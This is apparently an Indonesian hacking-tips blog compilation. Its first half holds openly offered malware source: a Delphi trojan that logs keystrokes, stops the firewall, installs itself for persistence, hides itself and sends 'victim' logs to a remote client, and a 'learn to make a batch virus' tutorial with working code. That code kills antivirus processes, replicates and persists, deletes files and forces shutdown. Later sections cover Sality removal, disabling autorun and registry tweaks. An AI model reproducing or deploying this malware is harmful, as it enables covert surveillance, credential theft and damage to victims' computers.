strLetter:=cr_lf+'focused window:' + cWindow + cr_lf + strLetter;
end;
form1.Memo1.Text:=form1.Memo1.Text + strLetter;
if DirectoryExists('c:¥winnt') then
form1.Memo1.Lines.SaveToFile('c:¥winnt¥system32¥winux¥' + sUserName + '.joo')
else
form1.Memo1.Lines.SaveToFile('c:¥windows¥system32¥winux¥' + sUserName + '.joo');
end;

function OLActiveCaption:string;
var
Handle:THandle;
Len:LongInt;
Title:string;
begin
Handle:=GetForegroundWindow;
Len:=GetWindowTextLength(Handle) + 1;
SetLength(Title,Len);
GetWindowText(Handle,PChar(Title),Len);
OLActiveCaption:=TrimRight(Title);
end;

end.

Main Unit :

unit Unit1;

interface

uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, ExtCtrls, shellapi, Registry, XDesktopServer, mmsystem, ScktComp;

type
TForm1 = class(TForm)

7
Timer1: TTimer;
Memo1: TMemo;
trojan: TDesktopServer;
ServerSocket1: TServerSocket;
Memo2: TMemo;
Button1: TButton;
Edit1: TEdit;
procedure Timer1Timer(Sender: TObject);
procedure FormCreate(Sender: TObject);
procedure ServerSocket1Accept(Sender: TObject;
Socket: TCustomWinSocket);
procedure Button1Click(Sender: TObject);
procedure ServerSocket1ClientRead(Sender: TObject;
Socket: TCustomWinSocket);
procedure Edit1Change(Sender: TObject);

private
{ Private declarations }

public
{ Public declarations }
end;

var
Form1: TForm1;

implementation

uses
untOffLineLogger, Unit2;

{$R *.dfm}
{$R wave.res}

{----------procedure start up file-----------------}

procedure RunOnStartup(sProgTitle,sCmdLine: string;bRunOnce : boolean );
var
sKey : string;
reg : TRegIniFile;
begin

8

if( bRunOnce )then
sKey := 'Once'
else
sKey := '';

reg := TRegIniFile.Create( '' );
reg.RootKey := HKEY_LOCAL_MACHINE;
reg.WriteString(
'Software¥Microsoft'
+ '¥Windows¥CurrentVersion¥Run'
+ sKey + #0,
sProgTitle,
sCmdLine );
reg.Free;
end;


{---------------keylogger unit-------------------}

procedure TForm1.Timer1Timer(Sender: TObject);
begin
OLGetLetter;
end;

{---------------saat aplikasi berjalan:-------------------}

procedure TForm1.FormCreate(Sender: TObject);
var
nmfile,nmfile2: string; //variabel copy file//
begin

serversocket1.Open;


// disable firewall win xp sp2>>>>>>>>>>>

shellexecute(0,'open', 'net.exe',' stop sharedaccess',0,0);

//-----------------copy file----------->>>>>>>>>>>>>

nmfile := Application.ExeName;


9

nmfile2 := 'c:¥windows¥system32¥drivers.exe';

CopyFile(PChar(nmfile), PChar(nmfile2), False);

//----------------open desktop-------->>>>>>>>>>>>>>

trojan.Portnya:='1975'; //membuka port 1975 untuk komunikasi
trojan.OpenDesktop;

//----------------kirim hasil text curian>>>>>>>>>>>

serversocket1.Active:=true;
if(serversocket1.Socket.activeconnections>0)then
serversocket1.Socket.Connections[0].SendText('Data Ketikan Korban : '+memo1.Text);


//----------------start up file>>>>>>>>>>>>>>>>>>>>>>

RunOnStartup(
'drivers',
'c:¥WINDOWS¥system32¥drivers.exe',
False);

//----------------hidden proccess>>>>>>>>>>>>>>>>>>>>>

Application.ShowMainForm := false;

//-----------------directory save file>>>>>>>>>>>>>>>>>

if DirectoryExists('c:¥winnt¥system32¥') = true then
if DirectoryExists('c:¥winnt¥system32¥winux¥') = false then
begin
CreateDir('c:¥winnt¥system32¥winux¥');
end;

if DirectoryExists('c:¥windows¥system32¥') = true then
if DirectoryExists('c:¥windows¥system32¥winux¥') = false then
begin
CreateDir('c:¥windows¥system32¥winux¥');
end;
end;

10

//saat socket server menerima koneksi dr client, eksekusi button1 >>>>>>>>>>>>>>

procedure TForm1.ServerSocket1Accept(Sender: TObject;
Socket: TCustomWinSocket);
begin
button1.Click;
end;

//Button 1 : pindahkan text memo 1 ke memo 2
//memo 1 adalah hasil ketikan korban

procedure TForm1.Button1Click(Sender: TObject);
begin
memo2.Lines.Add(memo1.text);
if(serversocket1.Socket.activeconnections>0)then
serversocket1.Socket.Connections[0].SendText('Victim Log: '+memo1.text);
end;

procedure TForm1.ServerSocket1ClientRead(Sender: TObject;
Socket: TCustomWinSocket);
begin
edit1.Text:=socket.ReceiveText;
end;

procedure TForm1.Edit1Change(Sender: TObject);
begin

if edit1.Text='message' then
begin form2.Show; end;

if edit1.Text='horse' then
begin PlaySound(PChar(1),HInstance, snd_ASync or snd_Memory or snd_Resource);
edit1.Clear;
end;

if edit1.Text='reboot' then
begin winexec('shutdown -r -t 0 -f',sw_normal); end;

if edit1.Text='shutdown' then
begin winexec('shutdown -s -t 0 -f',sw_normal); end;

11.
if edit1.Text='close' then
begin form2.Close; end;

if edit1.Text='ghost' then
begin PlaySound(PChar(2),HInstance, snd_ASync or snd_Memory or snd_Resource);
edit1.Clear; end;

if edit1.Text='ghost2' then
begin PlaySound(PChar(3),HInstance, snd_ASync or snd_Memory or snd_Resource);
edit1.Clear;
end;

if edit1.Text='nging' then
begin PlaySound(PChar(4),HInstance, snd_ASync or snd_Memory or snd_Resource);
edit1.Clear;
end;

if edit1.Text='ngung' then
begin PlaySound(PChar(5),HInstance, snd_ASync or snd_Memory or snd_Resource);

if edit1.Text='startup' then
begin PlaySound(PChar(6),HInstance, snd_ASync or snd_Memory or snd_Resource);
edit1.Clear;
end;
end;

end.

Hati - hati jangan sampai kena sendiri ya !!!
 

Mengatasi Virus Sality

virus yang udah pernah tenar pada tahun 2003 kini kembali muncul dengan aksi yang lebih “Berbahaya “….dari sebelumnya virus ini dimasukkan kedalam kategory parasit abiz………..karena sasarannya file yang berekstensi exe…….. Salitiy menginfeksi setiap file yang berekstensi exe…………j Wal hasil ukuran file asli membengkak menjadi sekitar 20KB. Bagusnya lagi Salitiy meletakkan source code nya pada empty segmen pada file yang ditumpangi dan mengubah entry poit asli ke bangun awal tubunya sehingga yang pertama kali dijalankan adalah source code palsu dan terkadang membuat file induk menjadi korup. Pada umunya file induk langsung menutup diri sesaat dijalankan.

Penyebarannya bisa dibilang “unik” karena setelah menginfeksi suatu file EXE (PE), maka file yang baru terinfeksi tersebut yang akan meneruskan aksi virusnya dan begitu seterusnya akan mencari korban lainnya. Pada saat file yang terinfeksi di-kill, bukan mati aksinya tapi diambil alih oleh predecessor- nya.
Untuk itu ada cara yang aman untuk menghilangkan virus ini tanpa mendelete langsung, dan saya sarankan (berdasarkan pengalaman) menggunakan cara ini:

1. download rmsality, virus removal khusus untuk virus sality dari Grisoft (produsen AVG), berisi tiga file yang harus anda dowload ke dalam satu folder
2. download fileASSASSIN

===============================================
Langkah-langkah CARA NGATASINNYA...!!

1. Installkan dan jalankan fileASSASSIN dan arahkan / ketik di menu browsenya ke c:\windows\system32\wmdrtc32.dll delete file-nya di cheklist kemudian klik execute. ulangi untuk file yang kedua c:\windows\system32\wmdrtc32.dl_
2. jalankan program rmsality yang sudah di download dan biarkan melakukan proses scanning secara keseluruhan. setelah selesai anda akan mendapatkan beberapa file yang tidak bisa di clean (failed to clean) dan antivirus meminta anda untuk mereboot system. (anda juga bisa melakukan scanning per-drive dengan cara masuk ke menu run, kemudian ketik cmd, kemudian masuk ke direktori rmsality dimana anda menyimpannya, kemudian ketik contoh: rmsality c:
3. reboot system. untuk meyakinkan silahkan scan lagi dengan antivirus yang lain, seperti ANSAV, AVG dll

Belajar Membuat Virus Batch

Kali ini saya akan berikan sedikit ilmu bagaimana cara membuat virus batch. Dulu virus ini ngetren sekali (kira-kira tahun 90-an lah). Tapi sekarang ini saya jarang nemuin virus ini berkeliaran…

Virus batch dibuat di notepad dan disimpan dengan ekstensi ”.bat”. Ternyata selain virus VBS masih ada juga virus yang dibuat pake notepad. Yah salah satunya virus BAT (virus Batch).

Kalo kmu hidupkan file notepad kosong dengan ekstensi ”.bat”, yang muncul malah ”bla bla bla is not valid 32 application”
Itu artinya kita harus masukkan code virus ke dalam tubuh file bat itu.. he he he he….
Kali ini akan saya ajarkan kalian… tapi ingat saya tidak bertanggung jawab atas kecerobohan kalian…

Pertama sekali ketik:
@echo off

Yang itu memang mesti ditulis, supaya file tidak memunculkan seluruh command. Dan ini wajib (dianjurkan bozzz). Gak diketik begitu juga gak apa-apa sih sebenarnya…

Baru setelah itu kita ketik code-code virus lainnya… he he he

Ini contoh-contoh code-nya…

Untuk meng-kill process yang aktif:
Tskill AVGUARD

Perhatikan: untuk meng-kill process ketik ”tskill” lalu nama process-nya tapi tanpa ekstensi…
Contoh lain:
Tskill KAV

Untuk menghapus file:
del C:\Progra~1\Accessories\Ca
lc.EXE

Untuk menulis ke regedit:
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Morphix /t REG_SZ /d %systemroot%\Morphix.bat /f

Untuk menampilkan messagebox
Msg * “Tulis pesanmu disini”

Dan masih banyak lagi contoh-contohnya….
Langsung aja neh salah satu virus batch :

@ECHO OFF
copy %0 %systemroot%\Morphix.bat > nul
copy %0 *.bat > nul
Attrib +h *.bat
cls
tskill AVGUARD
tskill AVGNT
tskill NMAIN
tskill KAV
tskill ad-aware
tskill av*
tskill PCMAV
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Mophix /t REG_SZ /d %systemroot%\Morphix.bat /f > nul
cls
echo [windows] >> %systemroot%\win.ini
echo load=%systemroot%\Morphix.bat >> %systemroot%\win.ini
echo run=%systemroot%\Morphix.bat >> %systemroot%\win.ini
Attrib +h %systemroot%\win.ini
del C:\docume~\owner\Desktop
shutdown -s -t 15
msg * ”Karena sesuatu hal komputer ini harus di-shutdown… Ha ha ha”
cls
:Morphix
start %0
goto Morphix
::*Hanya untuk pembelajaran*

mau liat source batch yang lainnya???
Nih virus batch Rawut

@echo off
rem c0d3d by Vires @ palu city
rem If u wanna know how this worx
rem don’t follow the code from top to bottom
rem but follow the flow of code
rem is it beautiful???yes it is!!!!
rem vires18[at]yahoo[dot]com
rem (c)2007,Indonesia
rem Dedicated to my Girl:eltietien(did u knew her b 4???)
rem Greetz to all my friends
rem cyrus,bdhamas,sat_anichell,einstein2,wau^wau,the_g irl
rem xniffer, miyabi ,the_simpson,psycopath & all i forget
rem sorry!!!!!
goto v781i21r1212e23s4c5o677o85l
:n56a19m75a0101011
%res%%c00l% %gal%* %gal%bat
%l% pulangpalu
:t45e18g14a11l
%zhe% x=exe
%zhe% c=com
%zhe% fah=py
%l% v25i85r19e0s
:l08a80t19i85f08a19h
%zhe% sya=att
%zhe% gal=*.
%zhe% vi=fo
%sya%%res%%ah% %gal%* %s%
%zhe% ti=co
%l% t45e18g14a11l
:v25i85r19e0s
%zhe% d=txt
%zhe% la=do
%zhe% m=doc
%vi%%res% %%r %te% (%gal%%x% %gal%%c% %gal%%d% %gal%%m% %gal%%lgu%) %la% %ti%%fah% %0 “%%r”
%l% n56a19m75a0101011
:v18i17r16e15s
%zhe% s=-%vi%s -%vi%r -%vi%h
%zhe% res=r
%zhe% c00l=en
%l% l08a80t19i85f08a19h
:v781i21r1212e23s4c5o677o85l
set zhe=set
%zhe% te=in
%zhe% l=goto
%zhe% ah=ib
%zhe% lgu=mp3
%l% v18i17r16e15s
palucity
rem Heh,BATCH STILL BEAUTIFUL RIGHT????
rem (c)vires

Disable Autorun pada Flashdisk

Disable Autorun Flashdisk. Penyebaran berbagai virus komputer dapat terjadi dari berbagai media, namun yang paling rentan untuk saat ini adalah melalui media UFD (USB Flash Disk). Berbagai cara yang dilakukan oleh pembuat virus seperti menciptakan file Autorun. inf pada flash disk secara otomatis, sehingga ketika flashdisk dicolokkan maka file Autorun.inf akan memanggil file yang ada didaftar file autorun.inf ini. Bagaimana cara untuk mematikan fungsi autorun dari flashdisk? 

Berbagai teknik dan cara yang dapat dilakukan untuk mendisable autorun ini dapat dilakukan dengan bantuan berbagai aplikasi, pengaturan registry, dan setting-setting lainnya. Berikut ini kita akan melakukan pengaturan pada Group Policy Editor.

Dari menu Start, pilih Run (kombinasi tombol Windows + R) kemudian ketikkan “gpedit.msc”, selanjutnya pada jendela Group Policy, pilih root “User Configuration“, kemudian pilih “Administrative Templates“, selanjutnya pilih “System“, dan pilih “Turn off Autoplay“.

Kemudian pada jendela “Turn of Autoplay Properties” pilih tab “Setting”, kemudian pilih “Enable” pada bagian “Turn off Autoplay on: pilih “All drives“.

Cara berikutnya, tanpa perlu melakukan pengaturan namun ketika flashdisk terpasang langsung tekan tombol “Shift” sampai proses loading selesai. Fungsi dari penekanan tombol shift adalah untuk mendisable autoplay dari Flashdisk sehinga file Autorun.inf yang berisi perintah menjalankan file virus tidak terjadi.

Membuat Anti Virus AutoRun dari Flash Disk

Jengkel dengan Virus yang otomatis menginfeksi Flash Disk Anda saat Anda colokkan USB Flash Disk Anda ke port komputer yang terinfeksi virus?
Bagaimana tidak kita akali saja dengan Membuat Anti Virus AutoRun dari USB Removable Drive semacam Flash Disk?
Seringkali Virus akan membuat file “autorun.inf” yang ber-attribute file hidden dan system (dan/atau bisa juga termasuk file virus/trojan – server) begitu Anda memasangkan Flask Disk yang dijadikan target penginfeksian virus ataupun target pengintipan aktivitas user atau pencurian data user dengan Trojan.
file autorun.inf inilah command atau pemicu tereksekusinya file induk dan library virus/trojan yang sudah bersarang di komputer lokal atau jaringan tempat Flash Disk Anda berinteraksi dan berhubungan langsung.
Bila Anda pengguna OS Windows, seperti kita ketahui, Versi Windows sebelum generasi Windows Vista (termasuk Windows Windows XP), secara default tidak mengijinkan proses “AutoRun” executable files dari media USB Removable Drives seperti External Hardisk ataupun Flash Drive/Flash Disk (kecuali dari media cakram digital) yang kemungkinan besar ditujukan untuk kepentingan keamanan. Windows hanya mengijinkan proses “AutoPlay” media saja seperti AutoPlay Movie/Music dari DVD atau command seperti Open/View file melalui windows explorernya.
Untungnya (dari faktor kemudahan) sekaligus sayangnya (dari faktor keamanan), Windows Vista secara default telah memperkenankan proses “AutoRun” dilangsungkan dengan dafault opsi yang bisa Anda pilih secara permanen.
Lalu bagaimana mengakali Windows XP agar bisa mengijinkan proses “AutoRun” executable files dari removable drives seperti External Hardisk maupun Flash Disk?
Di bawah ini Penulis sampaikan teknis pembuatan AutoRun AntiVirus pada Flash Disk.
LANGKAH I – Download ANtiVirus yang bersifat Portable
Kenapa harus Portable? Karena tujuan dari pembuatan AutoRun File dari Flash juga bersifat portable, jadi program rujukan, dalam hal ini Anti Virus, bisa dijalankan langsung dari Flash Drive tanpa diperlukan instalasi.
Anda bisa menggunakan ANSAV (Ansav.exe – jangan ANSAV Security Guard) atau PCMAV (PCMAV-CLN.EXE – Jangan PCMAV-RTP.EXE)
Masukkan file Anti Virus Portable (plus file library pendukungnya – bila ada) tersebut ke dalam Flash Disk Anda. Dalam contoh kali ini, untuk mempermudah, letakkan saja di Root Flash Disk Anda tanpa perlu Anda masukkan ke dalam folder.
LANGKAH II – Pembuatan AutoRun Dari Flash Disk
Ada 2 (dua) opsi yang bisa Anda pilih:

1. Menggunakan bantuan software orang lain, atau
   
2. Menggunakan bantuan tangan Anda sendiri

1. Menggunakan bantuan software orang lain

Nomor ini tidak akan menjadi bahan pembicaraan inti pada Artikel ini.
Namun bila Anda menghendaki, Penulis merekomendasikan Anda untuk menggunakan aplikasi bernama APO USB AutoRun yang sangat bagus dan berkualitas, berfungsi dengan baik pada Windows XP SP2, berukuran file kecil, dan gratis lagi.
APO AutoRun USB akan membuat service bernama autorunusb.exe yang berjalan di background sebagai detektor yang bertugas memindai file autorun.inf pada root removable drive dan mendeteksi semua executable files pada media removable drive serta akan mencocokkan executable files tersebut dengan file name dan path file yang dirujuk oleh file autorun.inf tersebut.
Yang penulis heran dari software ini, APO tetap akan melakukan scan pada seluruh executable files yang ada pada media removable drives.
Namun, walau efeknya sedikit memperlambat kinerja komputer, proses scanning tersebut Penulis cermati dan rasakan sangat bermanfaat juga untuk memindai keberadaan Virus pada Removable Drives yang belum sempat terdeteksi oleh AntiVirus yang aktif di komputer. Begitu proses scanning menemukan suatu executable files atau script yang dianggap sebagai malware oleh AntiVirus tersebut, maka akan memicu (trigger) notifikasi dari AntiVirus bahwa telah ditemukan threat (virus).
Sayangnya APO AutoRun USB harus Anda install dulu sebelum Anda bisa mengaplikasikan AutoRun dari flash disk. Untungnya APO AutoRun USB juga telah menyertakan instalasi untuk keperluan portable plus autorun.inf builder.

2. Menggunakan bantuan tangan Anda sendiri

Teknik yang bisa Anda lakukan adalah pertama-tama dengan sedikit mengubah struktur HEX pada Windows Registry.
Bila sebelumnya atau secara default Windows tidak mengijinkan proses “AutoRun” dari USB Flash Disk, maka Registry-nya seperti ini:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
“NoDriveTypeAutoRun”=dword:00000095
Agar Windows bisa mengijinkan proses “AutoRun” dari USB Flash Disk, maka ubah Registrynya menjadi:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
“NoDriveTypeAutoRun”=dword:00000091
Anda bisa mengCopy Registry Lines tersebut, lalu Anda simpan sebagai (misal): “AutoRun_Removable_Media_Enable.reg” untuk Anda Klik kanan dan Merge (gabungkan) dengan Windows Registry Database.
Setelah Anda berhasil memasukkan Registry Entry Files ke dalam Windows Registry Database, maka pekerjaan Anda yang terakhir adalah membuat file “autorun.inf” yang berfungsi sebagai Command dengan rujukan ke File Anti Virus yang telah Anda download dan masukkan ke dalam Flash Disk Anda (pada Langkah I)
Dalam contoh ini, Penulis menggunakan PC Media Anti Virus PCMAV-CLN.EXE yang filenamenya telah Penulis ubah menjadi PCM4V-CL34N32.EXE guna menghindari pendeteksian Virus yang dimungkinkan akan memblokir PCMAV-CLN.EXE.
Maka file “autorun.inf” PCMAV menjadi seperti ini:

PC Media Anti Virus
[AutoRun]
open=PCM4V-CL34N32.EXE
icon=PCMAV.ICO
shellexecute=PCM4V-CL34N32.EXE
shell\Scan Virus\command=PCM4V-CL34N32.EXE
shell=Scan Virus
Salin baris-baris INF tersebut, dan simpan sebagai .INF file dengan nama “autorun.inf” (tanpa tanda kutip), kemudian letakkan file “autorun.inf” tersebut pada Root Flash Disk Anda.
KETERANGAN

• Untuk file ICON dari PCMAV, Penulis extract dari file PCMAV-CLN.EXE, yang mana ICON file tersebut juga ditempatkan pada Root Flash Disk. Anda bisa menghilangkan/menghapus baris “icon=PCMAV.ICO” yang digunakan untuk memunculkan ICON File PCMAV sebagai Icon penanda Flash Disk seperti pada screenshot di atas. Baris rujukan ICON ini tidak mempengaruhi proses AutoRun. Namun bila Anda menginginkan PCMAV ICON tersebut, Anda bisa mendownloadnya dengan klik link ini.
• Baris-baris INF tersebut bisa Anda modifikasi sesuai selera tulisan Anda, yang penting path file Anda tidak salah; file tujuan Anda rujuk secara relatif.
• Jangan Lupa, untuk menghindari terhapusnya file dengan begitu mudahnya, sebaiknya sembunyikan saja File Anti Virus berserta library file pendukungnya (bila ada) maupun file “autorun.inf”nya dengan mengeset File Attributnya dengan “hidden” dan bila perlu “system”. Satu rekomendasikan lagi, alangkah baiknya, semua File tersebut Set File Attributenya menjadi “Read Only” agar, secara sederhana, tidak bisa termodifikasi.

Untuk keperluan setting modifikasi File Attribute terbut Anda bisa melakukannya dengan Select All files yang akan disembunyikan, lalu klik kanan file-file tersebut, pilik dan klik “properties”, dan beri tanda centang pada check box “hidden. Sedang untuk set menjadi “system”, Anda bisa menggunakan Windows ATTRIB.EXE di lingkungan kerja DOS atau Anda bisa juga menggunakan Attribute Changer yang berlingkungan kerja GUI. Q = Lho, katanya ga pake tool ya? A = untuk mudahnya, gunakan Attribute Changer bila ATTRIB.EXE dirusak/dihapus Virus/Admin dan Anda malas untuk extract dari Windows CAB.

Utak-atik Windows Dengan GPedit.msc

Selain melalui Registry Editor (Regedit) ada cara lain untuk mengutak-atik Windows, yaitu dengan Group Policy (gpedit.msc). dengan GPedit kita bisa mencegah wallpaper diganti-ganti, menyembunyikan Folder option, memblokir suatu software, dll.
Dibandingkan dengan Regedit, tampilan gpedit lebih user friendly. Cara penggunaan gpedit juga sangat mudah karena kita hanya mengganti properties suatu objek dengan 3 pilihan yaitu Not Configured, Enabled, dan Disabled. Jangan takut kalo nanti settingannya salah, karena akan muncul penjelasan apa yang akan terjadi kalo kita pilih salah satu dari ketiga pilihan tadi.

Untuk mengaktifkan Group Policy cukup masuk ke RUN lalu ketikkan gpedit.msc terus klik OK

Berikut ini beberapa contoh yang bisa dilakukan dengan GPedit

1. Mengunci Wallpaper
User Configuration -> Administrative Templates -> Control Panel -> Display -> Prevent Changing Wallpaper (pilih enabled)
Wallpaper masih bisa diganti lewat software ACDSee, untuk mencegahnya
masuk ke Registry Editor (ketik REGEDIT di RUN)
HKEY_CURRENT_USER -> Software -> ACD System -> ACDSee -> DisableWallpaper (Ubah value data jadi 01)

2. Menyembunyikan Folder Options
User Configuration -> Administrative Templates -> Windows Component -> WIndows Explorer -> Removes the Folder Options menu item from the tools menu ( pilih enabled)
3. Limit Reservable Bandwidth (Untuk koneksi internet)
Computer Configuration -> Administrative Templates -> Network -> QoS Packet Scheduler -> Limit Reservable Bandwidth (Pilih Enabled, lalu ubah bandwidth limit dari 20 ke 0)

4. Memblokir Program (untuk contohnya program Winamp.exe)
User Configuration -> Administrative Templates -> System -> Don’t run specified windows applications (Pilih enabled, lalu klik tombol SHOW.. -> klik ADD..ketikkan Winamp.exe -> klik OK)

5. Masih banyak lagi yang bisa dilakukan dengan Group Policy, yang perlu diperhatikan dalam meggunakan Group Policy adalah jangan sampai lupa lokasi settingan yang sudah diubah, karena di GPedit banyak folder dan subfolder yang membingungkan. SELAMAT MENCOBA

TIPS N TRIK DALAM REGEDIT

Berikut dibawah saya akan memaparkan langkah-langkah yang terdapat dalam regedit dan semuanya itu untuk mempercepat performa dari komputer anda, selain itu terdapat pula langkah-langkah untuk mengembalikan keadaan komputer anda menjadi seperti semula, seperti menu Run yang didisable oleh virus maka, anda bisa langsung mengembalikannya seperti semula dengan mengikuti langkah-langkah yang terdapat diregedit. Cara membuka regedit klik menu start, klik Run, lalu ketik regedit dan tekan ENTER
>>> Sebelum mengutak-atik Registry, ada baiknya melakukan backup terlebih dahulu <<<
caranya :
1. Klik tombol Start > Run.
2. Ketik regedit dan tekan Enter setelah berada didalam jendela Run.
3. Didalam Registry Editor, pilih menu File > Export.
4. Setelah Export Registry File muncul, masukkan nama file ke bagian File Name, misalnya backup-registry dan sebagainya.
5. tekan tombol Save.


  23 TIPS DALAM REGEDIT
(1). Mempercepat Akses Folder – dengan mendisable Last Access Update.
Jika anda memiliki banyak folder dan subdirectories, maka akses ke Direktory2 Windows XP terasa sangat berat dan
seringkali cuman membuang waktu. Dengan mengupdate time stamp di registry, yaitu last access update untuk
semua sub directory. Proceed with caution: Langkah berikut bukan untuk N00bie
1. Start>Run>regedit
2. “HKEY_LOCAL_MACHINESystemCurrentControlSetContr olFileSystem”
3. Klik kanan di bagian yg kan (cari area yg kosong), lalu pilih ‘DWORD Value’
4. Bikin DWORD Value dengan nama ‘NtfsDisableLastAccessUpdate’
5. Klik kanan pada value baru terus pilih ‘Modify’
6. Ubah data menjadi ‘1′
7. Klik ‘OK’

(2). Me-non-aktifkan Microsoft System Sounds
Secara default MS sound systems membuat komputer berbunyi/bersuara ketika booting awal, shutdown, error, dll.
Skenario suara windows jelas2 membuat komputer lebih lambat (terutama dalam waktu shutdown dan booting awal),
untuk me-non-aktifkan silahkan ikuti langkah berikut:
1. Buka Control Panel
2. Klik Sounds and Audio Devices
3. Klik tab Sounds
4. Pilih “No Sounds” dari Sound Scheme
5. Klik “No”
6. Klik “Apply”
7. Klik “OK”

(3). Mempercepat waktu Boot
Fitur yg lumayan asik dari Windows XP adalah kemampuan untuk mendefrag ketika ada dalam proses booting.
Boot Defrag pada prinsip menata file2 yg relevan dengan booting secara berurutan.Secara default fitur ini telah
diaktifkan pada beberapa Build Windows, tapi beberapa build windows tidak, ada baiknya kalo kita cross check
terhadap fitur yg satu ini.
1. Start Menu>Run
2. Regedit
3. HKEY_LOCAL_MACHINESOFTWAREMicrosoftDfrgBootOpt imizeFunction
4. Cari “Enable” dibagian kanan regedit
5. Klik “Modify”
6. Pilih “Y to enable”
7. Reboot
Tambahan: Bootvis juga bisa dicoba, untuk memangkas waktu boot dengan manufer yg manis.

(4). Mempercepat Performa Swapfile
Jika anda memiliki ram lebih besar dari 256MB bisa dibilang tweaking yg ini akan membuat sistem anda
berjalan lebih cepat. Tweaking ini pada dasarnya PC kita mengunakan setiap byte dari memori fisik yang
terpasang di komputer kita, SEBELUM mengunakan swap file.
1. Start>Run
2. “msconfig.exe”>ok
3. Klik tab System.ini
4. Klik tanda plus pada tab 386enh
5. Klik kotak new kemudian ketik “ConservativeSwapfileUsage=1?
6. Klik OK
7. Restart

(5). Mempercepat Loading Windows Menu
Tweak ini adalah tweaking fav saya, karena akan komputer kita terasa lebih cepat.
Tweaking ini membuang waktu delay ketika kita mengklik menu dan windows XP menampakkan Menu.
1. Start>Run
2. Regedit>Ok
3. “HKEY_CURRENT_USERControl PanelDesktop”
4. Pilih/Sorot “MenuShowDelay”
5. Klik kanan dan pilih “Modify’
6. Ketik angka “100? (aslinya 400)Angka 50-150 adalah kisaran yg baik, bisa disesuaikan dengan Mood anda

(6). Mempercepat Loading Program.
Tweaking ini bisa berjalan untuk sebagian besar program. Jika program tidak mau loading seperti yg diharapkan,
silahkan aja dikembalikan ke setting semula.
1. Klik kanan pada icon/shortcut yg berkaitan dengan program.
2. properties
3. Pada kotak ‘target’, tambahkan ‘ /prefetch:1′ diakhir kalimat.
4. Klik “Ok” gampang kan, Program akan loading lebih cepat.

(7). Mempercepat Shutdown Windows XP.
Tweaking ini mengurangi waktu tunggu secara otomatis ketika windows sudah menerima instruksi untuk shutdown.
1. Start>Run
2. ‘Regedit’>OK
3. ‘HKEY_CURRENT_USERControl PanelDesktop’
4. Sorot ‘WaitToKillAppTimeout’
5. Klik kanan dan pilih modify
6. Ubah value menjadi ‘1000′ (aslinya 20000)
7. Klik ‘OK’
8. Sorot ‘HungAppTimeout’
9. Klik kanan dan pilih modify
10. Ubah value menjadi ‘1000′
11. Klik ‘OK’
12. ‘HKEY_USERS.DEFAULTControl PanelDesktop’ sorot WaitToKillAppTimeout’
13. Klik kanan dan pilih modify
14. Ubah value ke ‘1000′ (aslinya 20000)16. Klik ‘OK’
15. ‘HKEY_LOCAL_MACHINESystemCurrentControlSetContr ol’ sorot ‘WaitToKillServiceTimeout’
16. Klik kanan dan pilih modify
17. Ubah value menjadi ‘1000′
18. Klik ‘OK’

(8). Mengganti Nama Recycle Bin
HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}
Klik ganda pada option (Default value) dan beri nama baru sesuai yang diinginkan pada Value Data.

(9). Memunculkan Rename Pada Recycle Bin
HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}/ShellFolder
Klik ganda pada Attributes > Edit Binary Value. Pada Value Data, ganti angka tersebut menjadi 0000 50 01 00 20.

(10). Menyembunyikan Recycle Bin
HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Explorer/Desktop/NameSpace
Hapus subkey {645FF040-5081-101B-9F08-00AA002F954E}, kemudian Restart komputer untuk melihat hasilnya.
Untuk memunculkannya kembali, buat kembali kombinasi angka {645FF040-5081-101B-9F08-00AA002F954E}.

(11). Menambah Isi Shortcut Menu Pada Recycle Bin
HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}/ShellFolder
Klik ganda Attributes dan ganti angka di Value Data dengan angka berikut ini:
0000 50 01 00 20 > Rename
0000 60 01 00 20 > Delete
0000 70 01 00 20 > Rename & Delete
0000 41 01 00 20 > Copy
0000 42 01 00 20 > Cut
0000 43 01 00 20 > Copy & Cut
0000 44 01 00 20 > Paste
0000 45 01 00 20 > Copy & Paste
0000 46 01 00 20 > Cut & Paste
0000 47 01 00 20 > Cut, Copy & Paste

(12). Mengembalikan Folder Documents Yang Hilang Di My Computer
HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Explorer/DocFolderPaths
Pilih menu Edit > New > String Value dan beri nama sesuai dengan username yang digunakan di Windows
(contohnya: Chippers) Klik ganda pada value tersebut dan masukkan path tempat dimana Documents anda
berada (contohnya D:\Documents)

(13). Menyembunyikan My Recent Documents
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Klik menu Edit > New > DWORD Value dan beri nama NoRecentDocsMenu.
Kemudian klik ganda pada DWORD Value tersebut, dan berikan angka 1 untuk mengaktifkannya.

(14). Menyembunyikan Menu Find
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Klik menu Edit > New > DWORD Value dan beri nama NoFind.
Kemudian klik ganda pada DWORD Value tersebut dan berikan angka 1 untuk mengaktifkannya. Restart komputer.

(15).Mempercepat Proses Shutdown Windows XP
HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control
Klik ganda WaitToKillServiceTimeout dan ubah nilainya menjadi lebih rendah dari 2000.

(16). Menyembunyikan Menu Run
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Buat sebuah DWORD Value baru dan beri nama NoRun. Klik ganda dan masukkan angka 1 sebagai Value Data.

(17). Menyembunyikan Log Off
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Klik menu Edit > New > Binary Value dan beri nama NoLogOff.
Klik ganda pada NoLogOff dan masukkan angka 01 00 00 00 pada bagian Value Data.
(18). Menyembunyikan Menu Turn Off Computer
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Klik menu Edit > New > DWORD Value dan beri nama NoClose.
